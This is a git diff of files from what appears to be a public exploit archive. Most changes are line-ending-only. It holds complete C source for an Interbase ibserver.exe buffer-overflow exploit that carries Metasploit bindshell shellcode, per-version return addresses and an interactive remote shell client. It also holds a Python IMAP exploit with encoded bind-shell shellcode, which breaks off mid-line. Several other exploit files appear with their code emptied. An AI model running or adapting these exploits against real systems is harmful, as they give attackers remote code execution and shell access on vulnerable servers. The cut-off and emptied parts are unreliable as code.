@@ -1,343 +1,343 @@ -/* - - http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064882.html - - Groetjes aan mijn sletjes: Doopie, Sjaakhans, [PS] en Sleepwalker :P - All your base are belong to FD2K2! - -*/ - -#include -#include -#include -#include -#include -#pragma comment(lib,"ws2_32") - -#define IB_PORT "3050" -// 0xFF - 0x8, jmp 8 bytes back -#define JMP "\x90\x90\xEB\xF7" -// 0xFFFFFFFF - (sizeof(shellcode) + BIG_JMP SIZE), jmp to beginning of shellcode -CHAR BIG_JMP[]="\xE9\xFF\xFF\xFF\xFF"; -// BIG_JMP SIZE -#define BIG_JMP_SIZE 5 - -CHAR ASCII_SHIT[]= -"\r\n >__ _ ___\r\n" -" / __\\26/07/2007| | __ / __\\ ___ _ __ ___ \r\n" -" /__\\/// _` |/ __| |/ //__\\/// _ \\| '_ \\ / _ \\\r\n" -" / \\/ \\ (_| | (__| \r\n" -" _______________BackBone_(c)_2007_______\r\n\r\n"; - -struct -{ - char* cVersion; - DWORD dwRet; - DWORD dwLength1; - DWORD dwLength2; -} -targets[]= -{ - {"Interbase Server 2007 <=SP1 v8.0.0.123-w32 (UNIVERSAL)",0x403D4D,2108,0x2000}, // pop,pop,ret ibserver.exe v8.0.0.123 - {"Interbase Server v7.5.0.129-w32 (UNIVERSAL)",0x403A5D,2108,0x2000}, // pop,pop,ret ibserver.exe v7.5.0.129 - {"Interbase Server v7.1.0.181-w32 (UNIVERSAL)",0x4039BD,1336,0x2000}, // pop,pop,ret ibserver.exe v7.1.0.181 - {"Interbase Server v6.0.1.6-w32 (UNIVERSAL) untested",0x403901,1336,0x2000}, // pop,pop,ret ibserver.exe v6.0.1.6 - },v; - -// don't change the offset -#define PORT_OFFSET 170 -#define BIND_PORT 10282 - -// bindshell shellcode from www.metasploit.com,mod by skylined -unsigned char shellcode[] = - "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52" - "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1" - "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a" - "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" - "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b" - "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32" - 
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff" - "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe" - "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50" - "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff" - "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89" - "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff" - "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60" - "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89" - "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56" - "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53" - "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53" - "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf" - "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf" - "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff" - "\x83\xc4\x5c\x61\xeb\x89"; - -#define SET_BIND_PORT(p) *(USHORT*)(shellcode+PORT_OFFSET)=htons(p); - -unsigned long lookupaddress(const char* pchost) -{ - unsigned long nremoteaddr = inet_addr(pchost); - - if (nremoteaddr == INADDR_NONE) - { - struct hostent* phe = gethostbyname(pchost); - - if (phe == 0) - return INADDR_NONE; - nremoteaddr = *((u_long*)phe->h_addr_list[0]); - } - return nremoteaddr; -} - -void showusage(char* argv) -{ - int i; - - printf("[*] Usage: %s ip[:port] target [bindport]\r\n", argv); - printf("[*] Standard port=%d, Standard bindport=%d.\r\n",atoi(IB_PORT),BIND_PORT); - printf("[*] Targets:\r\n\r\n"); - for (i=0;i<(sizeof(targets)/sizeof(v));i++) - printf("\t%2d: %s\r\n",i,targets[i].cVersion); -} - -void showinfo(void) -{ - printf("%s",ASCII_SHIT); - printf(" Borland Interbase ibserver.exe Create-Request Buffer Overflow Vulnerability\r\n"); - printf(" Advisory provided by TPTI-07-13.\r\n"); - printf(" Exploit by BackBone.\r\n\r\n"); -} - -/* ripped from TESO code and modifed by ey4s for 
win32 */ -void shell (int sock) -{ - int l; - char buf[512]; - struct timeval time; - unsigned long ul[2]; - - time.tv_sec = 1; - time.tv_usec = 0; - - while(1) - { - ul[0]=1; - ul[1]=sock; - - l=select(0,(fd_set*)&ul,NULL,NULL,&time); - if(l==1) - { - l=recv(sock,buf,sizeof(buf),0); - if (l<=0) - { - printf("\r\n[-] connection closed.\n"); - return; - } - l=write(1,buf,l); - if (l<=0) - { - printf("\r\n[-] connection closed.\n"); - return; - } - } - else - { - l=read(0,buf,sizeof(buf)); - if (l<=0) - { - printf("\r\n[-] connection closed.\n"); - return; - } - l=send(sock,buf,l,0); - if (l<=0) - { - printf("\r\n[-] connection closed.\n"); - return; - } - } - } -} - -int main(int argc, char *argv[]) -{ - char *host,*port; - unsigned long ulip; - WSADATA wsa; - SOCKET s; - struct sockaddr_in sock_in; - char buffer[16384]; - int bind,type; - unsigned int size=0; - DWORD dwLen1,dwLen2; - DWORD dwBigJmp=0xFFFFFFFF; - int i; - - showinfo(); - - if (argc<3 || argc>4) - { - showusage(argv[0]); - return -1; - } - - host=strtok(argv[1],":"); - if((port=strtok(NULL,":"))==0) - port=IB_PORT; - - if (WSAStartup(MAKEWORD(1,0),&wsa)!=0) - { - printf("[-] WSAStartup() error.\r\n"); - return -1; - } - - ulip=lookupaddress(host); - if (ulip==INADDR_ANY || ulip==INADDR_NONE) - { - printf("[-] invalid ip or host.\r\n"); - return -1; - } - - if (atoi(port)<0 || atoi(port)>65534) - { - printf("[-] invalid port.\r\n"); - return -1; - } - - type=atoi(argv[2]); - if (type>(sizeof(targets)/sizeof(v))-1 || type<0) - { - printf("[-] invalid target type.\r\n"); - return -1; - } - - printf("[+] Target: %s\r\n",targets[type].cVersion); - - bind=BIND_PORT; - if (argc==4) - { - if (atoi(argv[3])>0 && atoi(argv[3])<65535) - bind=atoi(argv[3]); - } - SET_BIND_PORT(bind); - - s=socket(AF_INET, SOCK_STREAM,0); - if (s==INVALID_SOCKET) - { - printf("[-] socket() error.\r\n",s); - return -1; - } - - sock_in.sin_port=htons((u_short)atoi(port)); - sock_in.sin_family=AF_INET; - 
sock_in.sin_addr.s_addr=ulip; - - printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff, - (ulip>>16)&0xff,(ulip>>24)&0xff,atoi(port)); - - if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR) - { - printf("Failed!\r\n"); - closesocket(s); - WSACleanup(); - return -1; - } - - printf("Ok.\r\n"); - - // constructing the buffer - memset(buffer,0,16384); - - memcpy(buffer,"\x00\x00\x00\x14\x00\x00\x00\x03",8); - size+=8; - - dwLen1=htonl(targets[type].dwLength1+(sizeof(DWORD)*3)); - - memcpy(buffer+size,&dwLen1,sizeof(DWORD)); - size+=sizeof(DWORD); - - memset(buffer+size,0x90,targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE)); - size+=targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE); - - // shellcode - memcpy(buffer+size,shellcode,sizeof(shellcode)); - size+=sizeof(shellcode); - - // jump to shellcode (0xFFFFFFFF - (sizeof(shellcode)+BIG_JMP_SIZE) - dwBigJmp-=sizeof(shellcode)+BIG_JMP_SIZE; - // prepare jump code - memcpy(BIG_JMP+1,&dwBigJmp,sizeof(DWORD)); - // write big jump code - memcpy(buffer+size,BIG_JMP,BIG_JMP_SIZE); - size+=BIG_JMP_SIZE; - - // jmp 8 bytes back - memcpy(buffer+size,JMP,sizeof(DWORD)); - size+=sizeof(DWORD); - - // return addr - memcpy(buffer+size,&targets[type].dwRet,sizeof(DWORD)); - size+=sizeof(DWORD); - - memset(buffer+size,0xFF,sizeof(DWORD)); - size+=sizeof(DWORD); - - dwLen2=htonl(targets[type].dwLength2); - - memcpy(buffer+size,&dwLen2,sizeof(DWORD)); - size+=sizeof(DWORD); - - memset(buffer+size,0x90,targets[type].dwLength2); - size+=targets[type].dwLength2; - - printf("[+] Sending buffer (len: %u) ... ",size); - - if (!send(s,buffer,size,0)) - { - printf("Failed.\r\n"); - closesocket(s); - WSACleanup(); - return -1; - } - - printf("Ok.\r\n"); - - closesocket(s); - - Sleep(1000); - - printf("[+] Connecting to %d.%d.%d.%d:%d ... 
",ulip&0xff,(ulip>>8)&0xff, - (ulip>>16)&0xff,(ulip>>24)&0xff,bind); - - s=socket(AF_INET, SOCK_STREAM,0); - if (s==INVALID_SOCKET) - { - printf("socket() error.\r\n",s); - WSACleanup(); - return -1; - } - - sock_in.sin_port=htons((u_short)bind); - sock_in.sin_family=AF_INET; - sock_in.sin_addr.s_addr=ulip; - - if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR) - { - printf("Failed!\r\n"); - closesocket(s); - WSACleanup(); - return -1; - } - - printf("Ok!\r\n\r\n--- w000t w000t ---\r\n\r\n"); - - shell(s); - - closesocket(s); - - WSACleanup(); - - return 0; -} - -// milw0rm.com [2007-07-30] +/* + + http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064882.html + + Groetjes aan mijn sletjes: Doopie, Sjaakhans, [PS] en Sleepwalker :P + All your base are belong to FD2K2! + +*/ + +#include +#include +#include +#include +#include +#pragma comment(lib,"ws2_32") + +#define IB_PORT "3050" +// 0xFF - 0x8, jmp 8 bytes back +#define JMP "\x90\x90\xEB\xF7" +// 0xFFFFFFFF - (sizeof(shellcode) + BIG_JMP SIZE), jmp to beginning of shellcode +CHAR BIG_JMP[]="\xE9\xFF\xFF\xFF\xFF"; +// BIG_JMP SIZE +#define BIG_JMP_SIZE 5 + +CHAR ASCII_SHIT[]= +"\r\n >__ _ ___\r\n" +" / __\\26/07/2007| | __ / __\\ ___ _ __ ___ \r\n" +" /__\\/// _` |/ __| |/ //__\\/// _ \\| '_ \\ / _ \\\r\n" +" / \\/ \\ (_| | (__| \r\n" +" _______________BackBone_(c)_2007_______\r\n\r\n"; + +struct +{ + char* cVersion; + DWORD dwRet; + DWORD dwLength1; + DWORD dwLength2; +} +targets[]= +{ + {"Interbase Server 2007 <=SP1 v8.0.0.123-w32 (UNIVERSAL)",0x403D4D,2108,0x2000}, // pop,pop,ret ibserver.exe v8.0.0.123 + {"Interbase Server v7.5.0.129-w32 (UNIVERSAL)",0x403A5D,2108,0x2000}, // pop,pop,ret ibserver.exe v7.5.0.129 + {"Interbase Server v7.1.0.181-w32 (UNIVERSAL)",0x4039BD,1336,0x2000}, // pop,pop,ret ibserver.exe v7.1.0.181 + {"Interbase Server v6.0.1.6-w32 (UNIVERSAL) untested",0x403901,1336,0x2000}, // pop,pop,ret ibserver.exe v6.0.1.6 + },v; + +// don't change the offset +#define 
PORT_OFFSET 170 +#define BIND_PORT 10282 + +// bindshell shellcode from www.metasploit.com,mod by skylined +unsigned char shellcode[] = + "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52" + "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1" + "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a" + "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" + "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b" + "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32" + "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff" + "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe" + "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50" + "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff" + "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89" + "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff" + "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60" + "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89" + "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56" + "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53" + "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53" + "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf" + "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf" + "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff" + "\x83\xc4\x5c\x61\xeb\x89"; + +#define SET_BIND_PORT(p) *(USHORT*)(shellcode+PORT_OFFSET)=htons(p); + +unsigned long lookupaddress(const char* pchost) +{ + unsigned long nremoteaddr = inet_addr(pchost); + + if (nremoteaddr == INADDR_NONE) + { + struct hostent* phe = gethostbyname(pchost); + + if (phe == 0) + return INADDR_NONE; + nremoteaddr = *((u_long*)phe->h_addr_list[0]); + } + return nremoteaddr; +} + +void showusage(char* argv) +{ + int i; + + printf("[*] Usage: %s 
ip[:port] target [bindport]\r\n", argv); + printf("[*] Standard port=%d, Standard bindport=%d.\r\n",atoi(IB_PORT),BIND_PORT); + printf("[*] Targets:\r\n\r\n"); + for (i=0;i<(sizeof(targets)/sizeof(v));i++) + printf("\t%2d: %s\r\n",i,targets[i].cVersion); +} + +void showinfo(void) +{ + printf("%s",ASCII_SHIT); + printf(" Borland Interbase ibserver.exe Create-Request Buffer Overflow Vulnerability\r\n"); + printf(" Advisory provided by TPTI-07-13.\r\n"); + printf(" Exploit by BackBone.\r\n\r\n"); +} + +/* ripped from TESO code and modifed by ey4s for win32 */ +void shell (int sock) +{ + int l; + char buf[512]; + struct timeval time; + unsigned long ul[2]; + + time.tv_sec = 1; + time.tv_usec = 0; + + while(1) + { + ul[0]=1; + ul[1]=sock; + + l=select(0,(fd_set*)&ul,NULL,NULL,&time); + if(l==1) + { + l=recv(sock,buf,sizeof(buf),0); + if (l<=0) + { + printf("\r\n[-] connection closed.\n"); + return; + } + l=write(1,buf,l); + if (l<=0) + { + printf("\r\n[-] connection closed.\n"); + return; + } + } + else + { + l=read(0,buf,sizeof(buf)); + if (l<=0) + { + printf("\r\n[-] connection closed.\n"); + return; + } + l=send(sock,buf,l,0); + if (l<=0) + { + printf("\r\n[-] connection closed.\n"); + return; + } + } + } +} + +int main(int argc, char *argv[]) +{ + char *host,*port; + unsigned long ulip; + WSADATA wsa; + SOCKET s; + struct sockaddr_in sock_in; + char buffer[16384]; + int bind,type; + unsigned int size=0; + DWORD dwLen1,dwLen2; + DWORD dwBigJmp=0xFFFFFFFF; + int i; + + showinfo(); + + if (argc<3 || argc>4) + { + showusage(argv[0]); + return -1; + } + + host=strtok(argv[1],":"); + if((port=strtok(NULL,":"))==0) + port=IB_PORT; + + if (WSAStartup(MAKEWORD(1,0),&wsa)!=0) + { + printf("[-] WSAStartup() error.\r\n"); + return -1; + } + + ulip=lookupaddress(host); + if (ulip==INADDR_ANY || ulip==INADDR_NONE) + { + printf("[-] invalid ip or host.\r\n"); + return -1; + } + + if (atoi(port)<0 || atoi(port)>65534) + { + printf("[-] invalid port.\r\n"); + return -1; + } + + 
type=atoi(argv[2]); + if (type>(sizeof(targets)/sizeof(v))-1 || type<0) + { + printf("[-] invalid target type.\r\n"); + return -1; + } + + printf("[+] Target: %s\r\n",targets[type].cVersion); + + bind=BIND_PORT; + if (argc==4) + { + if (atoi(argv[3])>0 && atoi(argv[3])<65535) + bind=atoi(argv[3]); + } + SET_BIND_PORT(bind); + + s=socket(AF_INET, SOCK_STREAM,0); + if (s==INVALID_SOCKET) + { + printf("[-] socket() error.\r\n",s); + return -1; + } + + sock_in.sin_port=htons((u_short)atoi(port)); + sock_in.sin_family=AF_INET; + sock_in.sin_addr.s_addr=ulip; + + printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff, + (ulip>>16)&0xff,(ulip>>24)&0xff,atoi(port)); + + if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR) + { + printf("Failed!\r\n"); + closesocket(s); + WSACleanup(); + return -1; + } + + printf("Ok.\r\n"); + + // constructing the buffer + memset(buffer,0,16384); + + memcpy(buffer,"\x00\x00\x00\x14\x00\x00\x00\x03",8); + size+=8; + + dwLen1=htonl(targets[type].dwLength1+(sizeof(DWORD)*3)); + + memcpy(buffer+size,&dwLen1,sizeof(DWORD)); + size+=sizeof(DWORD); + + memset(buffer+size,0x90,targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE)); + size+=targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE); + + // shellcode + memcpy(buffer+size,shellcode,sizeof(shellcode)); + size+=sizeof(shellcode); + + // jump to shellcode (0xFFFFFFFF - (sizeof(shellcode)+BIG_JMP_SIZE) + dwBigJmp-=sizeof(shellcode)+BIG_JMP_SIZE; + // prepare jump code + memcpy(BIG_JMP+1,&dwBigJmp,sizeof(DWORD)); + // write big jump code + memcpy(buffer+size,BIG_JMP,BIG_JMP_SIZE); + size+=BIG_JMP_SIZE; + + // jmp 8 bytes back + memcpy(buffer+size,JMP,sizeof(DWORD)); + size+=sizeof(DWORD); + + // return addr + memcpy(buffer+size,&targets[type].dwRet,sizeof(DWORD)); + size+=sizeof(DWORD); + + memset(buffer+size,0xFF,sizeof(DWORD)); + size+=sizeof(DWORD); + + dwLen2=htonl(targets[type].dwLength2); + + memcpy(buffer+size,&dwLen2,sizeof(DWORD)); + 
size+=sizeof(DWORD); + + memset(buffer+size,0x90,targets[type].dwLength2); + size+=targets[type].dwLength2; + + printf("[+] Sending buffer (len: %u) ... ",size); + + if (!send(s,buffer,size,0)) + { + printf("Failed.\r\n"); + closesocket(s); + WSACleanup(); + return -1; + } + + printf("Ok.\r\n"); + + closesocket(s); + + Sleep(1000); + + printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff, + (ulip>>16)&0xff,(ulip>>24)&0xff,bind); + + s=socket(AF_INET, SOCK_STREAM,0); + if (s==INVALID_SOCKET) + { + printf("socket() error.\r\n",s); + WSACleanup(); + return -1; + } + + sock_in.sin_port=htons((u_short)bind); + sock_in.sin_family=AF_INET; + sock_in.sin_addr.s_addr=ulip; + + if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR) + { + printf("Failed!\r\n"); + closesocket(s); + WSACleanup(); + return -1; + } + + printf("Ok!\r\n\r\n--- w000t w000t ---\r\n\r\n"); + + shell(s); + + closesocket(s); + + WSACleanup(); + + return 0; +} + +// milw0rm.com [2007-07-30] diff --git a/platforms/windows/remote/4255.html b/platforms/windows/remote/4255.html index 1f9bebfde..fc856316d 100755 --- a/platforms/windows/remote/4255.html +++ b/platforms/windows/remote/4255.html @@ -1,48 +1,48 @@ -
    ------------------------------------------------------------------------------
    - CHILKAT ASP String (CkString.dll <= 1.1) "SaveToFile()" Inscure Method
    - url: http://www.chilkatsoft.com/
    -
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    - 
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not be responsible for any damage.
    - 
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    - all software that use this ocx are vulnerable to this exploits.
    -
    - This control is marked as:
    - RegKey Safe for Script: False
    - RegKey Safe for Init: False
    - Implements IObjectSafety: True
    - IDisp Safe: Safe for untrusted: caller, data
    - IPersist Safe: Safe for untrusted: caller, data
    - IPStorage Safe: Safe for untrusted: caller, data
    ------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
-# milw0rm.com [2007-08-05]
+
    +-----------------------------------------------------------------------------
    + CHILKAT ASP String (CkString.dll <= 1.1) "SaveToFile()" Inscure Method
    + url: http://www.chilkatsoft.com/
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    + 
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not be responsible for any damage.
    + 
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    + all software that use this ocx are vulnerable to this exploits.
    +
    + This control is marked as:
    + RegKey Safe for Script: False
    + RegKey Safe for Init: False
    + Implements IObjectSafety: True
    + IDisp Safe: Safe for untrusted: caller, data
    + IPersist Safe: Safe for untrusted: caller, data
    + IPStorage Safe: Safe for untrusted: caller, data
    +-----------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
+# milw0rm.com [2007-08-05]
diff --git a/platforms/windows/remote/4259.txt
index fc2300952..3f9beafd4 100755
--- a/platforms/windows/remote/4259.txt
+++ b/platforms/windows/remote/4259.txt
@@ -1,53 +1,53 @@
-
-
-
-
-
-
-# milw0rm.com [2007-08-06]
+
+
+
+
+
+
+# milw0rm.com [2007-08-06]
diff --git a/platforms/windows/remote/426.c
index 6c547cb6a..0de419328 100755
--- a/platforms/windows/remote/426.c
+++ b/platforms/windows/remote/426.c
@@ -240,6 +240,6 @@ void loginftp(SOCKET sockfd, char *user, char *pass)
 checkstatus(recvbuf);
 printf("[+] User %s logged in.\r\n", user);
 }
-
-
-// milw0rm.com [2004-08-31]
+
+
+// milw0rm.com [2004-08-31]
diff --git a/platforms/windows/remote/4279.html
index cee355162..f9a97b02c 100755
--- a/platforms/windows/remote/4279.html
+++ b/platforms/windows/remote/4279.html
@@ -1,53 +1,53 @@
-
-
-
-
-
-
-
-
-# milw0rm.com [2007-08-10]
+
+
+
+
+
+
+
+
+# milw0rm.com [2007-08-10]
diff --git a/platforms/windows/remote/4287.py
index fef593361..8ffc665d5 100755
--- a/platforms/windows/remote/4287.py
+++ b/platforms/windows/remote/4287.py
@@ -1,113 +1,113 @@ -#!/usr/bin/python - -import os -import sys -import time -import socket -import struct - -#this is imap exploit - -#710 bytes, tcp port 9999 bind, borrowed from skape miller inventor of megacanvas -sc = "\x90" -sc += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xeb\x03\x59" -sc += "\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\x49\x49\x49" -sc += "\x49\x49\x49\x49\x49\x49\x49\x49\x51\x37\x5a\x6a\x66\x58\x50\x30" -sc += "\x41\x31\x42\x41\x6b\x41\x41\x76\x41\x32\x41\x41\x32\x42\x41\x30" -sc += "\x42\x41\x58\x50\x38\x41\x42\x75\x79\x79\x4b\x4c\x32\x4a\x7a\x4b" -sc += "\x42\x6d\x78\x68\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f\x75\x30\x6e\x6b" -sc += "\x42\x4c\x45\x74\x71\x34\x6c\x4b\x41\x55\x57\x4c\x4e\x6b\x33\x4c" -sc += "\x53\x35\x51\x68\x55\x51\x68\x6f\x4c\x4b\x72\x6f\x56\x78\x6e\x6b" -sc += "\x61\x4f\x77\x50\x76\x61\x38\x6b\x52\x69\x4e\x6b\x36\x54\x4e\x6b" -sc += "\x67\x71\x4a\x4e\x76\x51\x4f\x30\x6d\x49\x4e\x4c\x4d\x54\x4b\x70" -sc += "\x41\x64\x43\x37\x4b\x71\x6b\x7a\x76\x6d\x54\x41\x4f\x32\x7a\x4b" -sc += "\x6a\x54\x45\x6b\x33\x64\x56\x44\x77\x58\x34\x35\x6b\x55\x4c\x4b" -sc += "\x61\x4f\x46\x44\x55\x51\x58\x6b\x31\x76\x6c\x4b\x46\x6c\x30\x4b" -sc += "\x4e\x6b\x61\x4f\x75\x4c\x64\x41\x38\x6b\x53\x33\x54\x6c\x4c\x4b" -sc += "\x6d\x59\x50\x6c\x64\x64\x55\x4c\x30\x61\x6b\x73\x74\x71\x4b\x6b" -sc += "\x51\x74\x4c\x4b\x51\x53\x70\x30\x4c\x4b\x77\x30\x36\x6c\x4c\x4b" -sc += "\x72\x50\x35\x4c\x4e\x4d\x6c\x4b\x73\x70\x57\x78\x31\x4e\x42\x48" -sc += "\x4e\x6e\x50\x4e\x76\x6e\x5a\x4c\x30\x50\x6b\x4f\x49\x46\x75\x36" -sc += "\x56\x33\x53\x56\x75\x38\x37\x43\x34\x72\x35\x38\x74\x37\x54\x33" -sc += "\x44\x72\x63\x6f\x71\x44\x4b\x4f\x7a\x70\x42\x48\x38\x4b\x38\x6d" -sc += "\x6b\x4c\x47\x4b\x30\x50\x4b\x4f\x4e\x36\x51\x4f\x4f\x79\x4d\x35" -sc += "\x42\x46\x4b\x31\x7a\x4d\x33\x38\x57\x72\x76\x35\x61\x7a\x46\x62" -sc += "\x4b\x4f\x6e\x30\x51\x78\x4b\x69\x67\x79\x59\x65\x6c\x6d\x41\x47" -sc += 
"\x4b\x4f\x6e\x36\x41\x43\x56\x33\x76\x33\x52\x73\x70\x53\x51\x53" -sc += "\x70\x53\x32\x63\x32\x73\x6b\x4f\x4e\x30\x41\x76\x62\x48\x36\x47" -sc += "\x54\x4f\x41\x76\x72\x73\x4f\x79\x49\x71\x4e\x75\x31\x78\x6e\x44" -sc += "\x67\x6a\x64\x30\x4f\x37\x70\x57\x69\x6f\x6e\x36\x70\x6a\x74\x50" -sc += "\x62\x71\x73\x65\x4b\x4f\x38\x50\x62\x48\x4c\x64\x4e\x4d\x64\x6e" -sc += "\x58\x69\x62\x77\x4b\x4f\x7a\x76\x50\x53\x51\x45\x39\x6f\x58\x50" -sc += "\x71\x78\x6b\x55\x53\x79\x6f\x76\x53\x79\x36\x37\x39\x6f\x79\x46" -sc += "\x72\x70\x61\x44\x33\x64\x62\x75\x59\x6f\x48\x50\x4a\x33\x51\x78" -sc += "\x6d\x37\x71\x69\x79\x56\x71\x69\x70\x57\x6b\x4f\x6e\x36\x51\x45" -sc += "\x69\x6f\x6e\x30\x45\x36\x63\x5a\x41\x74\x35\x36\x72\x48\x30\x63" -sc += "\x50\x6d\x6f\x79\x59\x75\x63\x5a\x52\x70\x43\x69\x37\x59\x58\x4c" -sc += "\x4f\x79\x79\x77\x52\x4a\x33\x74\x4d\x59\x39\x72\x55\x61\x4f\x30" -sc += "\x7a\x53\x6d\x7a\x79\x6e\x47\x32\x76\x4d\x69\x6e\x47\x32\x34\x6c" -sc += "\x6d\x43\x6c\x4d\x72\x5a\x54\x78\x4e\x4b\x4c\x6b\x6c\x6b\x75\x38" -sc += "\x52\x52\x4b\x4e\x4e\x53\x55\x46\x79\x6f\x71\x65\x41\x54\x59\x6f" -sc += "\x4e\x36\x43\x6b\x71\x47\x51\x42\x52\x71\x62\x71\x52\x71\x51\x7a" -sc += "\x33\x31\x56\x31\x46\x31\x51\x45\x50\x51\x59\x6f\x4e\x30\x50\x68" -sc += "\x4c\x6d\x6e\x39\x53\x35\x6a\x6e\x62\x73\x49\x6f\x5a\x76\x50\x6a" -sc += "\x59\x6f\x4b\x4f\x34\x77\x59\x6f\x5a\x70\x6c\x4b\x32\x77\x39\x6c" -sc += "\x6c\x43\x4b\x74\x61\x74\x6b\x4f\x6a\x76\x50\x52\x79\x6f\x6e\x30" -sc += "\x42\x48\x7a\x4f\x6a\x6e\x59\x70\x63\x50\x42\x73\x4b\x4f\x48\x56" -sc += "\x79\x6f\x4e\x30\x66" - - -def Copulate(target,port): - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((target,port)) - return s - -def Fascism(target,u,p): - safe_readable_null = 0x71c010e4 # Safe readable, preferably null (ws2_32 on win2k3) - safe_writable = 0x0fff7004 # Safe writable (rsaenh.dll data section on win2k3) - pop_then_ret = 0x77e41a26 # EIP (pop, ret in kernel32 on win2k3) - call_esp = 0x77e839b3 # Return 
